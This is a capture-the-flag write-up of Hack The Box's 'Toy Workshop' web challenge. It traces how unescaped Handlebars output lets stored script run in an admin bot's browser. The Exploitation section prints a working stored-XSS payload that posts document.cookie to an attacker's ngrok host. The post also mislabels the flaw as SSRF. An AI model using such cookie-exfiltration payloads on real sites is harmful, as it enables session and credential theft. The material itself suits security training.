Kamil Gierach-Pacanek
CyberEthical.Me: Hacking for the Security Awareness

CyberEthical.Me: Hacking for the Security Awareness

HTB Cyber Santa CTF 2021: Toy Workshop

HTB Cyber Santa CTF 2021: Toy Workshop

Write-up

Kamil Gierach-Pacanek's photo
Kamil Gierach-Pacanek

Published on Dec 13, 2021

4 min read

Subscribe to my newsletter and never miss my upcoming articles

Table of contents

  • Introduction
  • Basic information
  • Recon
  • Weaponizing
  • Exploitation
  • Additional readings

Introduction

The work is going well on Santa's toy workshop but we lost contact with the manager in charge! We suspect the evil elves have taken over the workshop, can you talk to the worker elves and find out?

This is a complete write-up for the Toy Workshop challenge at Cyber Santa CTF 2021 hosted by Hack The Box. Learn more from additional readings found at the end of the article. I would be thankful if you mention me when using parts of this article in your work. Enjoy!

Basic information

#
TypeJeopardy CTF / Web
Organized byHack The Box
Name HTB Cyber Santa CTF / Toy Workshop
URLsctftime.org/event/1523
ctf.hackthebox.com/ctf/249
AuthorAsentinn / OkabeRintaro
https://ctftime.org/team/152207

πŸ”” CyberEthical.Me is maintained purely from your donations - consider one-time sponsoring with the Sponsor button or 🎁 become a Patron which also gives you some bonus perks. Join our Discord Server!

Recon

We have a downloadable content and docker instance to spin up.

By reading the source code, we can establish the flow of the application. There is a toy_workshop.db database

//index.js
const db = new Database('toy_workshop.db');

that holds a queries table.

--datbase.js
DROP TABLE IF EXISTS queries;

CREATE TABLE IF NOT EXISTS queries (
    id          INTEGER      NOT NULL PRIMARY KEY AUTOINCREMENT,
    query       VARCHAR(500) NOT NULL,
    created_at  TIMESTAMP    DEFAULT CURRENT_TIMESTAMP
);

The application can interact with that table through following queries:

--database.js

--addQuery(query)
INSERT INTO queries (query) VALUES (?)

--getQueries()
SELECT * FROM queries

The only way we can interact with the database is to insert new query

//routes/index.js
router.post('/api/submit', async (req, res) => {

        const { query } = req.body;
        if(query){
            return db.addQuery(query)
                .then(() => {
                    bot.readQueries(db);
                    res.send(response('Your message is delivered successfully!'));
                });
        }
        return res.status(403).send(response('Please write your query first!'));
});

because /queries call can be executed only from the localhost.

//routes/index.js
router.get('/queries', async (req, res, next) => {
    if(req.ip != '127.0.0.1') return res.redirect('/');

    return db.getQueries()
        .then(queries => {
            res.render('queries', { queries });
        })
        .catch(() => res.status(500).send(response('Something went wrong!')));
});

The /queries endpoint is called by the browser emulator - Puppeteer.

//bot.js
const puppeteer = require('puppeteer');

const browser_options = {
    headless: true,
    //...
};

const cookies = [{
    'name': 'flag',
    'value': 'HTB{f4k3_fl4g_f0r_t3st1ng}'
}];

const readQueries = async (db) => {
        const browser = await puppeteer.launch(browser_options);
        let context = await browser.createIncognitoBrowserContext();
        let page = await context.newPage();
        await page.goto('http://127.0.0.1:1337/');
        await page.setCookie(...cookies);
        await page.goto('http://127.0.0.1:1337/queries', {
            waitUntil: 'networkidle2'
        });
        await browser.close();
        await db.migrate();
};

module.exports = { readQueries };`

When analyzing the bot's readQueries function and the /api/submit endpoint code, we have the clear situation.

  1. Submitting the new query (adding row to queries table) executes the bot.readQueries() function.
  2. Bot opens the web application page: http://127.0.0.1:1337/
  3. Bot sets cookie flag=HTB{.*}.
  4. Queries are read by rendering the views/queries.hbs view without any sanitization.
    //views/queries.hbs
    <div class="dash-frame">
     {{#each queries}}
             <p>{{{this.query}}}</p>
         {{else}}
             <p class="empty">No content</p>
         {{/each}}
    </div>
    

There is a potential SSRF (Server Side Request Forgery) with Sensitive Data Exposure vulnerability.

Weaponizing

We should be able to push into the queries table the malicious JS code that would read the flag cookie and sends it back somehow, so we can read the flag. I found this pattern easy to recognize because I was participating in the HTB Cyber Apocalypse CTF this year (2021) and watched some John Hammond video about Alien Journal (see Additional readings).

So, what I did is I set up a simple ngrok tunnel on my machine without listener on my end. I can do that because ngrok provides a nice dashboard under localhost:4040 so I can see the incoming connections.

Exploitation

With that ready, I write an API call to insert the malicious JS into the queries table.

var q = "<script>fetch('http://****-**-***-***-***.ngrok.io/flag', {method:'POST', body: document.cookie});</script>";
fetch('/api/submit', {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json',
        },
        body: JSON.stringify({query: q}),
    })
    .then((response) => response.json()
        .then((resp) => {
            console.log(resp);
        }))
    .catch((error) => {
        console.log(error)
    });

2021-12-01-14-37-35.png

Additional readings

πŸ“Œ Follow the #CyberEthical hashtag on the social media
🎁 Become a Patron and gain additional benefits
πŸ‘Ύ Join CyberEthical Discord server
πŸ‘‰ Instagram: @cyber.ethical.me
πŸ‘‰ LinkedIn: CyberEthical.Me
πŸ‘‰ Twitter: @cyberethical_me
πŸ‘‰ Facebook: @CyberEthicalMe

Do you like what you see? Join the Hashnode.com now and start publishing. Things that are awesome:
βœ” Automatic GitHub Backup
βœ” Write in Markdown
βœ” Free domain mapping
βœ” CDN hosted images
βœ” Free built-in newsletter service
βœ” Built-in blog monetizing through the Sponsor feature
By using my link, you can help me unlock the ambassador role, which cost you nothing and gives me some additional features to support my content creation mojo.

Did you find this article valuable?

Support Kamil Gierach-Pacanek by becoming a sponsor. Any amount is appreciated!

See recent sponsors |Β Learn more about Hashnode Sponsors
Β 
Share this